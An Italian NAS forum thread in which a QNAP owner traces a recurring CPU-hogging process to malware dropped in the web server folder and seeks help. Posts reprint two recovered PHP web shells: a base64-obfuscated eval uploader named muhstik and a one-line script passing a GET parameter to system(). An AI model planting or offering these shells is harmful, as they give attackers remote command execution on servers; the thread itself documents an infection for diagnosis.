Processo spremi risorse

Utilizzate questo forum per qualsiasi argomento che non è categorizzato altrove.
Rispondi
lepitrust
Messaggi: 47
Iscritto il: 12 gen 2011, 10:05

Processo spremi risorse

Messaggio da lepitrust »

Ciao a tutti,
da qualche giorno ho notato che nel mio TS-453 PRO c'è uno strano processo in esecuzione che sfrutta quasi il 50% della cpu disponibile. Ho provato a disattivare tutte le app non necessarie, ma nulla... l'unica soluzione è stata killarlo da ssh, ma dopo poco torna...

Qualcuno sa a cosa possa essere dovuto?

Questo è preso dal comando top

Codice: Seleziona tutto

CPU: 57.1% usr  7.9% sys  0.1% nic 32.7% idle  0.2% io  0.0% irq  1.7% sirq
Load average: 5.50 4.24 3.33 8/1026 9067
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
 8049     1 httpdusr S     321m  4.0   0 48.3 {257853} sh
ho cercato se c'era qualcosa di anomalo in crontab, ma nulla...

Idee?
lepitrust
Messaggi: 47
Iscritto il: 12 gen 2011, 10:05

Re: Processo spremi risorse

Messaggio da lepitrust »

Codice: Seleziona tutto

12:42:10 up  2:07,  load average: 3.34, 2.17, 1.85
CPU: 54.1% usr  6.2% sys  2.0% nic 18.7% idle 18.7% io  0.0% irq  0.0% sirq
Load average: 3.34 2.17 1.85 3/998 23111
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
21211     1 httpdusr S     308m  3.9   3 49.9 {2521026} sh
Anche se continuo a killarlo continua a ricomparire...

report ps ax

Codice: Seleziona tutto

[~] # ps ax | grep 21211
21211 httpdusr   7708 S   sh

Queste sono le mie porte aperte

Codice: Seleziona tutto

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
631/tcp   open  ipp
1723/tcp  open  pptp
2049/tcp  open  nfs
3306/tcp  open  mysql
3493/tcp  open  nut
4000/tcp  open  remoteanything
4001/tcp  open  newoak
8080/tcp  open  http-proxy
30000/tcp open  ndmps
non so più cosa tentare...
lepitrust
Messaggi: 47
Iscritto il: 12 gen 2011, 10:05

Re: Processo spremi risorse

Messaggio da lepitrust »

Allora... forse ne sono venuto a capo grazie a qualche suggerimento del supporto tecnico Qnap.
Dopo aver disattivato tutte le app di terze parti e tutti i servizi strettamente non necessari ho scoperto che con il web server attivo il problema si presenta. Disattivandolo il problema sparisce.
Allora ho ricontrollato la cartella Qweb e ho trovato degli eseguibili che non facevano parte del mio sito e che compaiono nella lista dei processi attivi di quando il problema c'è...

Adesso ho provato a cancellarli e riavviare il tutto, e vedo se il problema si ripresenta.

Se qualcuno è interessato allego dump con il problema, prima di cancellare i file e del dopo, con il problema forse risolto. In aggiunta anche zip con gli eseguibili incriminati. Erano lasciati nella cartella Qweb.

ciao
Allegati
Q149I02319_after.zip
(385.69 KiB) Scaricato 16 volte
unknown.zip
(2.64 MiB) Scaricato 17 volte
Q149I02319_before.zip
(571.13 KiB) Scaricato 12 volte
lepitrust
Messaggi: 47
Iscritto il: 12 gen 2011, 10:05

Re: Processo spremi risorse

Messaggio da lepitrust »

Risposta di QNAP:

Codice: Seleziona tutto

It appears to be a malware attack.

I've noted this and will escalate this to development with high priority.

Please be sure to keep your Malware Remover updated.

If it reoccurs, please let me know.

Kind regards,
wozxyz
Messaggi: 1589
Iscritto il: 13 mag 2010, 12:30

Re: Processo spremi risorse

Messaggio da wozxyz »

Grazie per la condivisione!
TS-459 Pro - TS-221 - TS-212 - HS-210 Squeezebox Touch & Duet - WD Live Hub
lepitrust
Messaggi: 47
Iscritto il: 12 gen 2011, 10:05

Re: Processo spremi risorse

Messaggio da lepitrust »

Ciao a tutti,

di nuovo la stessa storia... processo spremi risorse su web server...
non capisco come diavolo riescano a creare i file...

Qualcuno ha qualche idea? Neanche il tool anti-malware ha trovato nulla...

muhstik.php

Codice: Seleziona tutto

<?php eval(base64_decode('ZWNobyAiPHRpdGxlPm11aHN0aWs8L3RpdGxlPjxiciAvPiI7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7ZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIERvbmUuPGI+PGJyPjxicj4nOyB9ZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQuPC9iPjxicj48YnI+JzsgfX0K')); ?>
A5932A7810268EF0AA42B9DDFC69C95F.php

Codice: Seleziona tutto

CMD2015<br><pre><?php @system($_GET['cmd']);?></pre>
Allegati
nuovi.zip
(959.9 KiB) Scaricato 9 volte
Avatar utente
PiaNi
Messaggi: 4181
Iscritto il: 25 ott 2011, 22:39
Località: Bari

Re: Processo spremi risorse

Messaggio da PiaNi »

Hai attivato il registro delle connessioni?
Gigabyte B550M Aorus Pro-P | Ryzen 5700x + Scythe Fuma 2 | nVidia RTX 3060 12GB | NVMe WDBlack 500GB + WD120EFAX
TS 473A: 3×WD60EFRX Raid5
TS 133: SGT EXOS 16TB
TS 453A: 3×WD84PURZ Raid5
TS 251+: WD40EFAX (SMR!!)
Synology 1520+: 4×WD4003FRYZ Raid5
maximuss
Messaggi: 399
Iscritto il: 17 lug 2008, 17:37

Re: Processo spremi risorse

Messaggio da maximuss »

lepitrust ha scritto:Ciao a tutti,

di nuovo la stessa storia... processo spremi risorse su web server...
non capisco come diavolo riescano a creare i file...

Qualcuno ha qualche idea? Neanche il tool anti-malware ha trovato nulla...
Hai attivo wordpress o altri CMS?


--------------------------------------------------------------
QNAP TVS-463
2x Hard Disk HD 3,5" 3TB WD RED

QNAP TS-219P
2x Hard Disk HD 3,5" 3TB WD RED
Avatar utente
selvaggi
Messaggi: 1634
Iscritto il: 02 feb 2016, 14:30
Località: provincia di Ancona

Re: Processo spremi risorse

Messaggio da selvaggi »

più che la sicurezza del nas a me viene pensato ad un bug sul sito, hai un sito in php? magari wordpress, oppure drupal o robe simili? non sarebbe la prima volta.
per questi applicativi ci sono plugin che fanno da antivurs e firewall e vanno installati sul sito.
Qnap TS-251 : Tick : 2 HD 4TB Toshiba MD04ACA400 : Tick : 2 RAM 4GB Kingston KVR16LS11/4 : Tick : t&m logitech wireless combo mk270 : Tick : wi-fi TP-Link tl-wdn4200 : Tick :

: book : Tutorial : Sig : TS-251 App Center : Thumbup : TS-251 download : WohoW : Manuali : Tv Happy : /// : Question : : Question : Wikipedia : Ok :
lepitrust
Messaggi: 47
Iscritto il: 12 gen 2011, 10:05

Re: Processo spremi risorse

Messaggio da lepitrust »

No, niente del genere solo un sitarello sviluppato da me, niente di particolarmente evoluto o strano.
Rispondi